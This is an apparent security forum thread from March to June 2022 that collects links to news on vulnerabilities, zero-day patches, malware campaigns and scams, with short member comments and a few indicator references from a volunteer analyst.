https://www.bleepingcomputer.com/news/security/qnap-warns-severe-linux-bug-affects-most-of-its-nas-devices/
-
Emotet Spoofs IRS in Tax Season-Themed Phishing Campaign
https://cofense.com/blog/emotet-spoofs-irs-in-tax-season/
-
Emotet Spoofs IRS in Tax Season-Themed Phishing Campaign
https://cofense.com/blog/emotet-spoofs-irs-in-tax-season/ (https://cofense.com/blog/emotet-spoofs-irs-in-tax-season/)
Emotet Spoofs IRS in Tax Season-Themed Phishing Campaign
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/17/13/04/c3ebIfVFk5L/preview.jpg)
https://youtu.be/dUocIALEzwk
It’s Tax Season again and Emotet is looking to cash in. Don’t become the victim!
For more on this topic see Confense.com.
https://cofense.com/blog/emotet-spoofs-irs-in-tax-season/
-
Weekly Security News Roundup w/e 3-18-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/18/22/41/c3eF3pVFGYb/preview.jpg)
https://youtu.be/dK_d-gUIM0c (https://youtu.be/dK_d-gUIM0c)
Security-related news thanks this week to cybernews.
https://cybernews.com/news/
-
Cyber threats and the Ukraine conflict
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/19/16/15/c3eqDoVFmrP/preview.jpg)
https://youtu.be/m4ONgmR8YxY (https://youtu.be/m4ONgmR8YxY)
A rundown of cyber threats emerging from the Russian invasion of Ukraine.
https://blog.avast.com/cyber-threats-and-the-ukraine-conflict-avast
Cyber threats usually inflict a financial toll which is terrible and needs to end.
The unprovoked attack on the people of Ukraine is killing innocent men, women,
children, and animals.
It’s reducing the cities to rubble and destroying a people's way of life.
This must stop and it must stop NOW.
-
Windows zero-day flaw giving admin rights gets unofficial patch, again
https://www.bleepingcomputer.com/news/microsoft/windows-zero-day-flaw-giving-admin-rights-gets-unofficial-patch-again/
-
Hundreds of HP printer models vulnerable to remote code execution
https://www.bleepingcomputer.com/news/security/hundreds-of-hp-printer-models-vulnerable-to-remote-code-execution/
-
Weekly Security News Roundup w/e 3-25-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/03/25/22/56/c3eT38Vqesm/preview.jpg)
https://youtu.be/pXkE4fPWinc (https://youtu.be/pXkE4fPWinc)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Emergency Google Chrome update fixes zero-day used in attacks
https://www.bleepingcomputer.com/news/security/emergency-google-chrome-update-fixes-zero-day-used-in-attacks/
-
Wyze Cam flaw lets hackers remotely access your saved videos
https://www.bleepingcomputer.com/news/security/wyze-cam-flaw-lets-hackers-remotely-access-your-saved-videos/
-
Wyze Cam flaw lets hackers remotely access your saved videos
https://www.bleepingcomputer.com/news/security/wyze-cam-flaw-lets-hackers-remotely-access-your-saved-videos/ (https://www.bleepingcomputer.com/news/security/wyze-cam-flaw-lets-hackers-remotely-access-your-saved-videos/)
Is old news like this really helpful or just designed to grab headlines?
Those using the camera have long since applied the update that's been available
since Nov. 2020.
The first version of the camera that was not patched reached it's end of life in 2020.
-
QNAP warns severe OpenSSL bug affects most of its NAS devices
https://www.bleepingcomputer.com/news/security/qnap-warns-severe-openssl-bug-affects-most-of-its-nas-devices/
-
Apple emergency update fixes zero-days used to hack iPhones, Macs
https://www.bleepingcomputer.com/news/security/apple-emergency-update-fixes-zero-days-used-to-hack-iphones-macs/
-
Weekly Security News Roundup w/e 4-1-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/04/01/14/55/c3fV2NVq0rL/preview.jpg)
https://youtu.be/7vTHHncwdh4 (https://youtu.be/7vTHHncwdh4)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Justice Department Announces Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate (GRU)
https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation
https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html
https://detection.watchguard.com/
-
Weekly Security News Roundup w/e 4-8-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/04/09/14/17/c3fQ2bVqmOt/preview.jpg)
https://youtu.be/1TNfN_iYqII (https://youtu.be/1TNfN_iYqII)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Yandex is causing data privacy concerns for mobile users
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/04/10/14/59/c3f62RVqH8a/preview.jpg)
https://youtu.be/PsKogYyuFQ0 (https://youtu.be/PsKogYyuFQ0)
In this matter, the user's trust is ultimately put into the app developers' hands.
The real question is who to trust.
See the full article at: https://blog.avast.com/yandex-and-data-privacy
-
Critical HP Teradici PCoIP flaws impact 15 million endpoints
https://www.bleepingcomputer.com/news/security/critical-hp-teradici-pcoip-flaws-impact-15-million-endpoints/
-
Critical HP Teradici PCoIP flaws impact 15 million endpoints
https://www.bleepingcomputer.com/news/security/critical-hp-teradici-pcoip-flaws-impact-15-million-endpoints/ (https://www.bleepingcomputer.com/news/security/critical-hp-teradici-pcoip-flaws-impact-15-million-endpoints/)
To address all of the issues, users are urged to update to version 22.01.3 or later,
which uses OpenSSL 1.1.1n and libexpat 2.4.7.
HP released the security updates on April 4 and 5, 2022, so you are secure if you have
already updated Teradici since then.
-
Warning: Did You Install the Play Store on Windows 11? Read This Now
https://www.howtogeek.com/797298/warning-did-you-install-the-play-store-on-windows-11-read-this-now/
-
Warning: Did You Install the Play Store on Windows 11? Read This Now
https://www.howtogeek.com/797298/warning-did-you-install-the-play-store-on-windows-11-read-this-now/ (https://www.howtogeek.com/797298/warning-did-you-install-the-play-store-on-windows-11-read-this-now/)
That should teach folks a lesson.
Install from a reputable site like Microsoft when it comes to things like the Microsoft Store
which is part of Windows.
When you play with fire, you wind up getting burned.
-
Critical flaw in Elementor WordPress plugin may affect 500k sites
https://www.bleepingcomputer.com/news/security/critical-flaw-in-elementor-wordpress-plugin-may-affect-500k-sites/
https://www.pluginvulnerabilities.com/2022/04/12/5-million-install-wordpress-plugin-elementor-contains-authenticated-remote-code-execution-rce-vulnerability/
-
More threats to php driven CMS like Word Press and Magento. CMS=Content Management Software).
A critical hole could infest: https://helpx.adobe.com/security/products/magento/apsb22-13.html
So scan your webshop website here: https://www.magereport.com/
Word Press websites can be hacked by mere Lets-Encrypt logs:
https://www.whitefirdesign.com/blog/2022/04/11/fresh-installs-of-wordpress-apparently-being-hacked-based-on-public-disclosure-from-lets-encrypt/
Maybe al CT logs could be involved, see: Various CT Logs: https://crt.sh/monitored-logs
polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
-
FBI: Payment app users targeted in social engineering attacks
https://www.bleepingcomputer.com/news/security/fbi-payment-app-users-targeted-in-social-engineering-attacks/
-
Google Chrome emergency update fixes zero-day used in attacks
https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-zero-day-used-in-attacks/
-
Weekly Security News Roundup w/e 4-15-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/04/15/12/48/c3folJVYcJw/preview.jpg)
https://youtu.be/lJ7-itqEDlU (https://youtu.be/lJ7-itqEDlU)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
-
T-Mobile customers warned of unblockable SMS phishing attacks
https://www.bleepingcomputer.com/news/security/t-mobile-customers-warned-of-unblockable-sms-phishing-attacks/
-
T-Mobile customers warned of unblockable SMS phishing attacks
https://www.bleepingcomputer.com/news/security/t-mobile-customers-warned-of-unblockable-sms-phishing-attacks/ (https://www.bleepingcomputer.com/news/security/t-mobile-customers-warned-of-unblockable-sms-phishing-attacks/)
Security News Flash - T-Mobile warning of unblockable SMS phishing attacks
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/04/16/15/53/c3fDoMVYndo/preview.jpg)
https://youtu.be/ocaaaC0aJjM (https://youtu.be/ocaaaC0aJjM)
The New Jersey Cybersecurity & Communications Integration Cell (NJCCIC) issued
a warning after multiple customers have filed reports of being targeted by this
new SMS phishing (smishing) campaign. Read more at
https://www.bleepingcomputer.com/news/security/t-mobile-customers-warned-of-unblockable-sms-phishing-attacks/
-
Enemybot could develop from a Ddos-bot into ransomware malware.
Re: https://urlhaus.abuse.ch/browse.php?search=enemybot
Re: https://www.abuseipdb.com/check/198.12.116.254
and https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/
Also this analysis: https://any.run/report/b0411b4c908566c6bdcb8c9fdd544d1c624103f32357c86350cdc157f1c1d6e8/7df4bece-43b2-4eab-9e59-31cc16d7d734
cracked software download here detected (by community reporting): https://www.virustotal.com/gui/url/a38345f1d6fa09755f147678f7ee0c248ad8d70a9c8c7a0bf51d1e48234ddfa4/community (reported as: Malicious chrome extension download from crack files).
polonus (volunteer cold recon website security-analyst and website error-hunter)
-
Workaround for security issue in 7-Zip until it is fixed
https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/
-
Workaround for security issue in 7-Zip until it is fixed
https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/ (https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/)
I personally don't like to delete files.
I simply renamed the 7-zip.chm file to 7-zip.mhc
The file remains but the program can no longer access the file.
-
Workaround for security issue in 7-Zip until it is fixed
https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/ (https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/)
I personally don't like to delete files.
I simply renamed the 7-zip.chm file to 7-zip.mhc
The file remains but the program can no longer access the file.
Well, I just deleted the help file, never read/needed it anyway. ;)
-
Workaround for security issue in 7-Zip until it is fixed
https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/ (https://www.ghacks.net/2022/04/18/workaround-for-security-issue-in-7-zip-until-it-is-fixed/)
I personally don't like to delete files.
I simply renamed the 7-zip.chm file to 7-zip.mhc
The file remains but the program can no longer access the file.
Well, I just deleted the help file, never read/needed it anyway. ;)
I haven't used it either, but I have left it in place and renamed as bob3160 did.
-
Office fraud and phish @-office-1010-online.azurewebsites.net
Re: https://maltiverse.com/url/fba6686783dc3e37307905e468416f1a8f7489a1b4479ec7148c6977b8136f5b
8 security vendors detect: https://www.virustotal.com/gui/url/87b44887d59dbf2df065ef78cb0aa0277d5561c704f985a80b6eba013a57b187/details
polonus
-
Unofficial Windows 11 upgrade installs info-stealing malware
https://www.bleepingcomputer.com/news/security/unofficial-windows-11-upgrade-installs-info-stealing-malware/
-
These apps won’t let you quit them unless you pay up or figure out their tricks
https://www.theverge.com/2022/4/15/23027363/apple-scammy-apps-mac-app-store-moderation
-
New 7-Zip Archiver Hack Reveals a long-Ignored
Windows Vulnerability
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/04/19/22/43/c3fq35VYXTm/preview.jpg)
https://youtu.be/sIaZUuqy2n0
The latest versions of 7-Zip contain a vulnerability (CVE-2022-29072) that lets hackers
gain administrative privileges on a system.
But this vulnerability, which exploits the 7-Zip help file, should alarm all Windows users,
as it highlights an age-old problem on Windows systems.
You’ll find Andrew Heinzman’s excellent article on this topic at the following link:
https://www.reviewgeek.com/115336/new-7-zip-archiver-hack-reveals-a-long-ignored-windows-vulnerability/
-
But this vulnerability, which exploits the 7-Zip help file, should alarm all Windows users, as it highlights an age-old problem on Windows systems.
So, it's up to MS to fix this issue. Let's see...
-
Tech support scams targeting seniors on the rise
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/04/21/13/58/c3frI9VYDM8/preview.jpg)
https://youtu.be/v4DXc5geQpQ
Tech support scammers target older people because they believe them
to be more trusting and they tend to be more financially secure than younger people.
Read Emma McGowan’s excellent article by following the link below:
https://blog.avast.com/tech-support-scams-targeting-seniors
Watch what happened to Phyllis by watching her video.
https://youtu.be/ar2MOvn2aDc
-
Weekly Security News Roundup w/e 4-22-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/04/22/15/45/c3f3oGVYYpM/preview.jpg)
https://youtu.be/sHWuENKxr18
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
QNAP warns users to disable AFP until it fixes critical bugs
https://www.bleepingcomputer.com/news/security/qnap-warns-users-to-disable-afp-until-it-fixes-critical-bugs/
-
Synology warns of critical Netatalk bugs in multiple products
https://www.bleepingcomputer.com/news/security/synology-warns-of-critical-netatalk-bugs-in-multiple-products/
-
Weekly Security News Roundup w/e 4-29-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/04/29/21/56/c3fUr8VYpx8/preview.jpg)
https://youtu.be/IRt2pufRkYY (https://youtu.be/IRt2pufRkYY)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Fake Windows 10 updates infect you with Magniber ransomware
https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/
-
Fake Windows 10 updates infect you with Magniber ransomware
https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/ (https://www.bleepingcomputer.com/news/security/fake-windows-10-updates-infect-you-with-magniber-ransomware/)
If you get your updates from any place other than this,
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/01/13/45/c3hVIGVY5E5/preview.jpg)
you probably deserve the infection.
-
Google SMTP relay service abused for sending phishing emails
https://www.bleepingcomputer.com/news/security/google-smtp-relay-service-abused-for-sending-phishing-emails/
-
New phishing warns: Your verified Twitter account may be at risk
https://www.bleepingcomputer.com/news/security/new-phishing-warns-your-verified-twitter-account-may-be-at-risk/
-
New phishing warns: Your verified Twitter account may be at risk
https://www.bleepingcomputer.com/news/security/new-phishing-warns-your-verified-twitter-account-may-be-at-risk/ (https://www.bleepingcomputer.com/news/security/new-phishing-warns-your-verified-twitter-account-may-be-at-risk/)
Since Twitter is in the news, expect the hackers to jump on the opportunity.
Never give a sucker an even break has been their motto forever. :)
-
Allowing too many exceptions leaves you wide open to infection
https://blog.avast.com/exceptions-risks
-
Allowing too many exceptions leaves you wide open to infection
https://blog.avast.com/exceptions-risks (https://blog.avast.com/exceptions-risks)
https://youtu.be/Dt_ZEBguelE (https://youtu.be/Dt_ZEBguelE)
-
SECURITY ALERT: Active Golang-Written Botnet StealthWorker Infects Thousands of Websites via Distributed Brute-Force Attacks
https://heimdalsecurity.com/blog/security-alert-botnet-stealthworker/
-
Weekly Security News Roundup w/e 5-6-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/06/14/25/c3h12TVYRYU/preview.jpg)
https://youtu.be/tlZZ0FrPTkU (https://youtu.be/tlZZ0FrPTkU)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/
-
Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/
I can't believe those who believe you can get something for nothing - I can't remember when I was first told about - if its seems to be too good to be true then it most likely it isn't.
But greed is a powerful thing.
-
Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/ (https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/)
I can't believe those who believe you can get something for nothing - I can't remember when I was first told about - if its seems to be too good to be true then it most likely it isn't.
But greed is a powerful thing.
My offer to sell the Brooklyn Bridge is still on the table.
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/08/12/31/c3hjlwVrc5Z/preview.jpg)
I'm selling it really cheap. Look at all the money you can make from the tolls. :)
-
Crypto Scammers Exploit: Elon Musk Speaks on Cryptocurrency
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/ (https://www.mcafee.com/blogs/other-blogs/mcafee-labs/crypto-scammers-exploit-talk-on-cryptocurrency/)
I can't believe those who believe you can get something for nothing - I can't remember when I was first told about - if its seems to be too good to be true then it most likely it isn't.
But greed is a powerful thing.
My offer to sell the Brooklyn Bridge is still on the table.
I'm selling it really cheap. Look at all the money you can make from the tolls. :)
;D 8)
-
This victim had his life savings stolen in a crypto romance scam
https://blog.avast.com/crypto-romance-scams
-
HP fixes bug letting attackers overwrite firmware in over 200 models
https://www.bleepingcomputer.com/news/security/hp-fixes-bug-letting-attackers-overwrite-firmware-in-over-200-models/
-
Weekly Security News Roundup w/e 5-13-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/14/18/26/c3h2FOVrqyt/preview.jpg)
https://youtu.be/Hr2QzXPAIug (https://youtu.be/Hr2QzXPAIug)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Hi bob3160,
Musk's acquiring twitter has been put on halt for the moment. See and search at -nitter.com.
He won't be happy either with the EU granting a law to screen all social media messages to be able to trace posssible child and grooming abuse messaging. Total surveillance has been and will be upon us sooner or later. As they will find some excuse for totalitarian measures. :-\
polonus
-
Hi bob3160,
Musk's acquiring twitter has been put on halt for the moment. See and search at -nitter.com.
He won't be happy either with the EU granting a law to screen all social media messages to be able to trace posssible child and grooming abuse messaging. Total surveillance has been and will be upon us sooner or later. As they will find some excuse for totalitarian measures. :-\
polonus
The "hold" is covered in the video. :)
-
Apple emergency update fixes zero-day used to hack Macs, Watches
https://www.bleepingcomputer.com/news/security/apple-emergency-update-fixes-zero-day-used-to-hack-macs-watches/
-
Large scale attacks on Word Press websites with Tatsu-builder plug-in.
This could concern over 50.000 websites vulnerable:
https://www.wordfence.com/blog/2022/05/millions-of-attacks-target-tatsu-builder-plugin/
See: https://nvd.nist.gov/vuln/detail/CVE-2021-25094
polonus
-
Why is everyone getting hacked on Facebook?
https://blog.avast.com/facebook-hacks
-
NVIDIA fixes ten vulnerabilities in Windows GPU display drivers
https://www.bleepingcomputer.com/news/security/nvidia-fixes-ten-vulnerabilities-in-windows-gpu-display-drivers/
-
Critical Jupiter WordPress plugin flaws let hackers take over sites
https://www.bleepingcomputer.com/news/security/critical-jupiter-wordpress-plugin-flaws-let-hackers-take-over-sites/
-
Weekly Security News Roundup w/e 5-20-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/20/14/56/c3hY28VrzkH/preview.jpg)
https://youtu.be/FdlCqi3uR9w (https://youtu.be/FdlCqi3uR9w)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
The biggest financial scams of 2022
https://blog.avast.com/top-financial-scams
-
Photos of abused victims used in new ID verification scam
https://www.bleepingcomputer.com/news/security/photos-of-abused-victims-used-in-new-id-verification-scam/
-
DuckDuckGo under fire for letting through Microsoft-scripts by its browser.
It has come to an agreement with Microsoft not to block Microoft on third-paty-websites.
Particular scripts exist that you can add to Tampermonkey extension to again block these.
polonus
-
This issue with DuckDuckGo is with their DuckDuckGo browser on android.
How do browsers compare privacy-wise?
(because privacy and anonymity really do no longer exist) results are not absolute.
Just see here: https://privacytests.org/ The winner seems to be: https://librewolf.net
polonus
-
The biggest financial scams of 2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/24/22/55/c3hZ3NVrmSw/preview.jpg)
https://youtu.be/eZ5OiCw7xaY (https://youtu.be/eZ5OiCw7xaY)
Learn how to protect yourself – and your cash – from the dirtiest tricks on the web.
Thanks to GRACE MACEJ (https://blog.avast.com/author/grace-macej) for her excellent article on this topic.
https://blog.avast.com/top-financial-scams
-
DuckDuckGo under fire for letting through Microsoft-scripts by its browser.
It has come to an agreement with Microsoft not to block Microoft on third-paty-websites.
Particular scripts exist that you can add to Tampermonkey extension to again block these.
polonus
DuckDuckGo browser allows Microsoft trackers due to search agreement
https://www.bleepingcomputer.com/news/security/duckduckgo-browser-allows-microsoft-trackers-due-to-search-agreement/
-
DuckDuckGo under fire for letting through Microsoft-scripts by its browser.
It has come to an agreement with Microsoft not to block Microoft on third-paty-websites.
Particular scripts exist that you can add to Tampermonkey extension to again block these.
polonus
DuckDuckGo browser allows Microsoft trackers due to search agreement
https://www.bleepingcomputer.com/news/security/duckduckgo-browser-allows-microsoft-trackers-due-to-search-agreement/
This is a strange turn of events for DuckDuckGo.
Whilst I don't use the DuckDuckGo browser, the reason I find this interesting is, it isn't all that long ago that I stopped using the DuckDuckGo browser add-on and also dropped the DuckDuckGo search option in Firefox. The main reason for that is that the DuckDuckGo add-on was too intrusive and I felt it broke some sites.
DuckDuckGo I had also somehow became my default search engine on a couple of times in Firefox and I hadn't changed that at all and I changed it back to me default search engine. The worst part was the results on DuckDuckGo searches returned a patheticly small amount of hits in the search (useless would be a good word to use).
All in all for me it has gone downhill very rapidly.
-
New ChromeLoader malware surge threatens browsers worldwide
https://www.bleepingcomputer.com/news/security/new-chromeloader-malware-surge-threatens-browsers-worldwide/
-
How license plate scanners challenge our data privacy
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/26/10/41/c3hO6pVr7HS/preview.jpg)
https://youtu.be/orNe0T4VQpg (https://youtu.be/orNe0T4VQpg)
There's a massive amount of data in private hands
and without sufficient controls by the government.
My thanks to David Strom for his excellent article.
https://blog.avast.com/license-plate-scanners-data-privacy
-
Intuit warns of QuickBooks phishing threatening to suspend accounts
https://www.bleepingcomputer.com/news/security/intuit-warns-of-quickbooks-phishing-threatening-to-suspend-accounts/
-
luntrus searched on IntelligeX for CVE-2022-1853,
this is a vulnerability just being patched with a new Google Chrome version.
Seach results - https://attackerkb.com/topics/NhNbhpIsam/cve-2022-1853
2020-12-21 11:24:32
attackerkb.com - Topics | AttackerKB 2020-12-21 - 2021-11-23
├── about - About | AttackerKB 2020-12-30 - 2021-11-23
├── activity-feed - Activity Feed | AttackerKB 2020-12-30 - 2021-11-23
├── leaderboard - Leaderboard | AttackerKB 2020-12-30 - 2021-11-23
├── search?attackVector=LOCAL&q= - Search Results | AttackerKB 2020-12-30 - 2021-01-31
├── search?privilegesRequired=LOW&q= - Search Results | AttackerKB 2020-12-30 - 2021-01-31
├── search?q=&userInteraction=NONE - Search Results | AttackerKB 2020-12-30 - 2021-01-31
├── search?userInteraction=NONE - Search Results | AttackerKB 2020-12-30
└── topics - Topics | AttackerKB 2020-12-30 - 2021-11-23
├── 1yvp3hVNSN/cve-2020-17136?referrer=home - CVE-2020-17136 | AttackerKB 2020-12-30 - 2021-01-31
└── DCzIXKVJbk/cve-2020-0662 - CVE-2020-0662 | AttackerKB
Description
** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided. Info credits go to luntrus.
polonus
-
Weekly Security News Roundup w/e 5-27-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/27/20/14/c3htY2Vr8t0/preview.jpg)
https://youtu.be/P1bmPo_Tx1o (https://youtu.be/P1bmPo_Tx1o)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Will Hollywood’s Lawsuits Shut Down
Your Favorite VPN?
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/05/31/21/09/c3hwrQV3eqm/preview.jpg)
https://youtu.be/cCEOn7cFdHA (https://youtu.be/cCEOn7cFdHA)
If you want to torrent copyrighted material, a VPN will hide what you’re doing.
Well, for now, at least. Read the full article on this topic at,
https://www.howtogeek.com/807819/will-hollywoods-lawsuits-shut-down-your-favorite-vpn/
-
FBI warns of Ukrainian charities impersonated to steal donations
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ukrainian-charities-impersonated-to-steal-donations/
-
FBI warns of Ukrainian charities impersonated to steal donations
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ukrainian-charities-impersonated-to-steal-donations/
Just when you think these bottom feeding pond scum can't get any lower, you see just how low they can get.
-
FBI warns of Ukrainian charities impersonated to steal donations
https://www.bleepingcomputer.com/news/security/fbi-warns-of-ukrainian-charities-impersonated-to-steal-donations/ (https://www.bleepingcomputer.com/news/security/fbi-warns-of-ukrainian-charities-impersonated-to-steal-donations/)
Just when you think these bottom feeding pond scum can't get any lower, you see just how low they can get.
They never miss an opportunity to make money.
-
Actually, the "lowest" any criminal can get is when they take a human life with the money motive being the reason for the murder.
I mean, is anyone really surprised the criminal elements would use that conflict to do what we are being informed about by the FBI?
Truthfully, charities have been a target of scams for a very long time, and even before these Net crimes came about.
Criminal folks just ain't too cool. But I should be very careful. I've never been convicted in a court of law, but I have been jailed a few times for fighting. And a couple of those times was for fighting law enforcement folks that had gone too far while doing their job. Last time, though, I didn't know the fella was an undercover cop.
Point is that maybe I am a semi-criminal. I smoked a joint once many, many years ago when that was illegal. Funny, too, as that was with a cop; an MP.
Anyway, using charities for cover in a criminal manner to get money is nothing new.
-
Telegram’s blogging platform abused in phishing attacks
https://www.bleepingcomputer.com/news/security/telegram-s-blogging-platform-abused-in-phishing-attacks/
-
Critical Atlassian Confluence zero-day actively used in attacks
https://www.bleepingcomputer.com/news/security/critical-atlassian-confluence-zero-day-actively-used-in-attacks/
-
Weekly Security News Roundup w/e 6-3-2022
(https://i.imgur.com/9bGVFOlm.jpg) (https://i.imgur.com/9bGVFOl.png)
https://youtu.be/5mk1n73d-fg (https://youtu.be/5mk1n73d-fg)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Alert (AA22-158A) - People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices
https://www.cisa.gov/uscert/ncas/alerts/aa22-158a
-
Emotet malware now steals credit cards from Google Chrome users
https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-credit-cards-from-google-chrome-users/
-
Weekly Security News Roundup w/e 6-10-2022
(https://d1ka0itfguscri.cloudfront.net/Lh/2022/06/10/16/37/c316DAV3USs/preview.jpg)
https://youtu.be/-P-VdJK-uXc (https://youtu.be/-P-VdJK-uXc)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Hacked Instagram accounts are scamming users
https://blog.avast.com/instagram-scams
-
Drupal Releases Security Updates
https://www.cisa.gov/uscert/ncas/current-activity/2022/06/13/drupal-releases-security-updates
-
L.S.
Additionally to what my good forum friend, Asyn, posted on the new emotet variant earlier here.
Emotet-malware steals your creditcard data from inside Google Chrome.
Analysis: https://www.joesandbox.com/analysis/326849/1/html
We see three windows executables involved: winword executable,
out there to lure you to lower your defenses by executing macro's etc.
The actual powershell.exe to siphon your data out, the actual E-banking fraud.
Conhost.exe as system executable (to bypass AV-detection).
Would voodooshield and/or OSArmor have signalled
the bad actions of these windows executables right away,
as MS do not describe these as vulnerabilities, but rather qualifies them as "features".
So now one understands why not to run Windows OS as admin, whenever you can avoid it.
Good over 70% of av-vendors now will detect and flag emotet for the devious malware it is.
polonus
-
Don’t be fooled by lottery scams
https://blog.avast.com/lottery-scams
-
Weekly Security News Roundup w/e 6-17-2022
(https://i.imgur.com/h0SJiawm.jpg) (https://i.imgur.com/h0SJiaw.png)
https://youtu.be/PqG9ZRxAVAo (https://youtu.be/PqG9ZRxAVAo)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Microsoft: June Windows updates may break Wi-Fi hotspots
https://www.bleepingcomputer.com/news/microsoft/microsoft-june-windows-updates-may-break-wi-fi-hotspots/
-
Don’t be fooled by lottery scams
https://blog.avast.com/lottery-scams (https://blog.avast.com/lottery-scams)
Don’t be fooled by lottery scams
(https://i.imgur.com/BPfTl0Am.jpg) (https://i.imgur.com/BPfTl0A.png)
https://youtu.be/Q8BQccCX2ts (https://youtu.be/Q8BQccCX2ts)
These scams can come by email, text, or regular mail –
here’s how to identify them.
Thanks to Grace Macej for her excellent article.
https://blog.avast.com/author/grace-macej
-
after id download a software and had run it a cmd'd open and ran a command and know im having my avast blocking this file on firewall ALL THE TIME. i dont know what is it neither how to remove it. when i ran the virus scanner it isnt recognized as a virus.
-
Vishing scams are on the rise
(https://i.imgur.com/biniebXm.jpg) (https://i.imgur.com/biniebX.png)
https://youtu.be/7D-ZKlMJUes (https://youtu.be/7D-ZKlMJUes)
Vishing scams can come in many forms, but they generally involve two vectors
that both aim at getting you to hand over your information.
To find out what Interpol is doing about this problem, look at GRACE MACEJ (https://blog.avast.com/author/grace-macej)’s
excellent article at the following link:
https://blog.avast.com/vishing-scams (https://blog.avast.com/vishing-scams)
-
Weekly Security News Roundup w/e 6-24-2022
(https://i.imgur.com/PDs0skvm.jpg) (https://i.imgur.com/PDs0skv.png)
https://youtu.be/Nziyr3rtnG0 (https://youtu.be/Nziyr3rtnG0)
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc (https://www.avast.com/en-us/index#pc)
-
The right way to handle Cookie Banners
(https://i.imgur.com/IWqSP1Mm.jpg) (https://i.imgur.com/IWqSP1M.png)
https://youtu.be/KMFa_1_4eTU (https://youtu.be/KMFa_1_4eTU)
When you get to a website and are greeted with a Cookie Banner,
here's the right action to take and it is NOT Accept All.
-
Weekly Security News Roundup w/e 7-1-2022
